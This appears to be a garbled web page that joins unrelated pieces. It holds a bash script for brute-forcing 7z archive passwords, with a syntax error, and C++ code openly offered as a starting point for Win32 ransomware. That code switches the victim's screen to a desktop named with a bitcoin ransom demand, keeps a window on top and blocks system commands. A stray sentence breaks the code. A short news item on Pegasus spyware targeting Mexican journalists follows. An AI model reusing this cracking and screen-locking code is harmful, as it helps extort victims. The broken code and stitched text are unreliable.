Class is in Session
Dependency: p7zip GNU package.
#!/bin/bash
# @(#) p7crack -- Password crack a target 7z file
# Usage: ./p7crack.sh <target_file>
declare -a LIST=(password1 password2 password3)
for x in ${LIST[@]); do
7z x ${1} -p${x}
if [ $? -eq 0 ]; then
echo "${x} is the password"
fi
doneThe following is a basic (C++) program to build out Win32 ransomware projects. It will let you “control” a Windows session’s terminal/screen. The file encrypting, transporting, ransoming, destruction, etc, is left as an exercise to the reader.
#include <Windows.h>
#include <WinGDI.h>
void CreateWndContent0(HWND parent)
{
HWND wnd;
wnd = CreateWindowExW(NULL, L"BTN", L"btn", 0x50012F00, 50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
SendMessage(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}
LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
switch (msg)
{
case WM_CREATE:
CreateWndContent0(hwnd);
break;
case WM_COMMAND:
switch (LOWORD(wparam))
{
case IDC_BUTTON0:
MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
SendMessageW(hwnd, WM_DESTROY, NULL, false);
break;
}
break;
case WM_SYSCOMMAND:
return true;
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, msg, wparam, lparam);
}
return FALSE;
}
HWND CreateWnd0()
{
HWND wnd;
wnd = CreateWindowExW(NULL, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, 1920, 1080, NULL, NULL, instance, NULL);
// Get screen size dynamically for the win
hWindow0 = wnd;
SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
ShowWindow(wnd, SW_SHOWNORMAL);
UpdateWindow(wnd);
return wnd;
}
DWORD WINAPI Window0Thread( LPVOID param )
{
SetThreadDesktop(hDesktop); // New desktop where further windows created
RegisterClasses(WndProc0, WND_CLASS_NAME0);
CreateWnd0();
MessageLoop();
ExitThread(0);
}
namespace Window
{
bool CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
{
if(GetAncestor(hwnd, 3) == hWindow0)
return true;
ShowWindow(hwnd, SW_HIDE);
return true;
}
bool Init(HINSTANCE hInstance)
{
instance = hInstance;
InitCommonControls();
h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");
hWinsta = GetProcessWindowStation();
SetProcessWindowStation(hWinsta);
hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", 0, 0, 0, GENERIC_ALL, NULL);
hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
SetThreadDesktop(hDesktop); // All windows created under this desktop.
SwitchDesktop(hDesktop); // Take control of what the user sees. Show them the message.
hThreadWindow0 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) &Window0Thread, 0, 0, 0);
return true;
}
void DeInit()
{
SwitchDesktop(hOldDesktop); // Restore the old, original, desktop.
Because you're a nice boy ;)
CloseDesktop(hDesktop);
CloseWindowStation(hWinsta);
}
}A group known as the Cartel Project has released a report detailing the targeting of citizen journalists throughout Mexico who report on cartel dealings. Jorge Carrasco was targeted by software from the Israeli NSO Group called Pegasus, confirmed watchdog group Citizen Lab.
The watchdog group has found at least nine journalists in Mexico targeted with the Pegasus software. While it is doubtful NSO Group entertains cartels for business, the Mexican government is a known customer of various “lawful intercept” software businesses, including NSO Group. It is likely the software ends up in the hands of cartel operators through insiders working within the Mexican government.
It is not known whether the eight journalists killed during 2020 in Mexico were targeted with such spyware.